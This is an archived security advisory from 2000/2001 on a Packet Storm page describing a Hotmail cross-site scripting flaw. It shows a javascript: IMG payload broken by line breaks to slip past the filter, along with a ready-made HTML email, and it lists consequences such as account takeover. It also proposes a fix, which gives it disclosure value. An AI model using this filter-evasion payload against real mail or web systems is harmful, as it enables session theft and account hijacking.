what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

hack-hm-1.0.txt

hack-hm-1.0.txt
Posted Nov 22, 2001
Authored by Hawaiian Superman

Hotmail is vulnerable to yet another serious security problem involving javascript. Windows, MacOS, and Linux users are affected. Filters may be bypassed by putting line feeds in the middle of the javascript code, the browser will remove the line feeds and execute it.

tags | exploit, javascript
systems | linux, windows
SHA-256 | 38d619755398daddb4094c74d9e46a705ebf54917924ac7f57da9be93f94b110

hack-hm-1.0.txt

Change Mirror Download
Sure:

####################[Title]####################
Hotmail Security Alert (Hack HM1.0)! 5/10/2000
By: Da Hawaiian HaXorS
"Give back da aina!"

####################[Disclaimer]####################
In no event shall Da Hawaiian HaXorS be held liable for any special, indirect
or
consequential damages or any damages whatsoever resulting from loss of use,

data or profits, whether in an action of contract, negligence or other
action, arising out of or in connection with the use or performance
of this information.

In Short, we take no responsibility for the information within this document.
The information contained within is our sole opinion and not the responsibility
or opinion of any party we are affiliated with. Whatever anyone does with
this information is entirely of their own accord.

Lastly, anyone currently employed by any county, state, or federal law enforcement
agency is not allow to posses or read this material by command of the authors.
This is for the security community, not for legislative muscle. So DELETE
IT FOOL!
end rant.

####################[Introduction]####################
This document for written to bring attention to security flaws within the
Microsoft Hotmail email system. As we have seen dozens of times
before, javascript poses a security danger to web applications, especially
when
not properly protected.

Also, I must note that the recent security hole posting on
http://www.peacefire.org/security/fakemailform/
IS NOT A HACK. Just tricking the user.

####################[Scope]####################
The scope of this problem will most likely affect any and all browsers that
have javascript turned on by default. Now lets see here....

That covers all major operating systems. (Windows, MacOS, *nix)
and covers both major browsers. (Internet Explorer 3,4,5 and Netscape 2,
3,4 and 5!?)

So we can safely assume everyone who currently uses Hotmail is at risk regardless
of
their current software. Unless there are a few die-hards who use lynx to
check
thier hotmail account.


####################[Detailed Exploit]####################
The following line will execute a line of JavaScript Code. This
browser feature has been well documented elsewhere.

<IMG SRC="javascript:alert('GameOver, Hax0rs win!');"> /* Example, not
actual exploit */

MS Hotmail attempts to filter this type of attack by search and replace.
However, interesting results are noticed when the string is broken up by
a few multiple
line breaks.

/* Actual Exploit */
<IMG SRC="java

scri


pt:alert('GameOver, Hax0rs win!');">

Seems that the line breaks makes it possible to bypass the filters, yet
is still
executed within the browser.

For the script kiddy: (You must send the mail as HTML mail).

MIME-Version: 1.0
From: Script Kiddy <scriptkiddy@wannabe.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: The Script Kiddy Has You OWNED!

<HTML><BODY>
<IMG SRC="java

scri


pt:alert('GameOver, Hax0rs win!');">
</BODY></HTML>
>.

/* J0l0S2h8fj8i0Ce2ahe027 */

####################[Potential Disasters]####################
The limit to the disastrous consequences of this are limited only to the
skill
and creativity of intruder. So, lets give some examples shall we:

1) Hotmail Account take over. Yes, attacker can gain both username and password
or whatever Hotmail uses to track the session. Not like it matters.

2) Use exploit in conjunction with a KNOWN browser exploits to access the
system.
Hmm. I wonder if JS can be used to exploit an IE security bug, writing a
file
to the system (Can you say "I LOVE YOU"?), and then execute that file. Seems
possible.

3) Re-Direct the user to somewhere else they want.
Wow, wouldn't spammers just love to be able to re-direct a massive amount
of
Hotmail users to some Pr0n site. HAH!

Remember, limited only in creativity.

####################[Suggested Fix]####################
The silver bullet fix would be that Microsoft would take security and the
privacy of its customers seriously with a proactive approach rather than
deny
and post a patch approach.

However, given that is an unreasonable request, we suggest the following:
Removethe ALL carriage returns from string before analyzing it.


--end

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close